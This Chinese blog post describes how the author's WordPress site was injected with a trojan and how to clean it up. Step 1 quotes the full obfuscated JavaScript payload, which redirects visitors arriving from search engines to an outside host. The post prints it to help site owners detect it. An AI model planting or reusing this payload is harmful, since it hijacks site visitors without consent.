首页 学建网站 木马来了,怎么防?

木马来了,怎么防?

作者:

修改日期:

一直在研究wordpress程序,但是前几天遇到一个纠结的问题,小川SEO博客在火狐和谷歌浏览器下提示网站被攻击:
木马攻击页面
咨询空间商说是因为程序有漏洞被恶意扫描导致,我惊出一身汗,wordpress不是被称为最安全的博客程序吗?怎么会有漏洞呢?又怎么会被挂马呢?
网上搜了一些信息,原来每一套程序都不是完美的,都会有或多或少的程序漏洞,这也是很多建站程序频繁升级的原因,所以建站程序一定要保持最新,有升级尽量升级程序。
带着问题打开wordpress中文官方网站,发现wordpress最新版本在4月21日已经升级到WordPress 3.3.2了,而我的还是wordpress3.3版本的呢,经过多方搜集,最终解决了这个小问题,这里也分享下解决方法:
1、找到并删除木马程序;
这个是必须的,先把闯入家门的强盗赶出去,才可以最一步防护,打开你的网站源文件看看有没有以下形式的代码:

<script language=\”JavaScript\”>eval(function(p,a,c,k,e,r){e=function(c){return(c<a?”:e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!”.replace(/^/,String)){while(c–)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return’\\\w+’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(‘\\\b’+e(c)+’\\\b’,’g’),k[c]);return p}(‘e r=x.9,t=\”\”,q;4(r.3(\”m.\”)!=-1)t=\”q\”;4(r.3(\”7.\”)!=-1)t=\”q\”;4(r.3(\”8.\”)!=-1)t=\”p\”;4(r.3(\”a.\”)!=-1)t=\”q\”;4(r.3(\”f.\”)!=-1)t=\”g\”;4(r.3(\”j.\”)!=-1)t=\”q\”;4(t.6&&((q=r.3(\”?\”+t+\”=\”))!=-1||(q=r.3(\”&\”+t+\”=\”))!=-1))B.C=\”v\”+\”w\”+\”:/\”+\”/A\”+\”b\”+\”k\”+\”5\”+\”h.\”+\”c\”+\”z/s\”+\”u\”+\”5\”+\”h.p\”+\”d?\”+\”t\”+\”y=1&t\”+\”i\”+\”l=\”+r.n(q+2+t.6).o(\”&\”)[0];’,39,39,’|||indexOf|if|rc|length|msn|yahoo|referrer|altavista|ogo|bi|hp|var|aol|query||er|ask|sea|ms|google|substring|split||||||ea|ht|tp|document|||go|window|location’.split(‘|’),0,{}))</script>

代码隐藏的很严密,检查各个文件,比如functions.php文件,找到后删除然后上传覆盖;
2、提交谷歌网站管理员工具审查网站;
http://goo.gl/NNI33
没有账号就注册一个,然后按照提示一步步的把网站提交并提交审核,但是审核可能需要1~2个工作日;
3、升级网站程序;
外敌肃清了,还需要加强下网站防御,升级网站程序,提高安全。如果升级程序,请参照文章《wordpress怎么安全升级?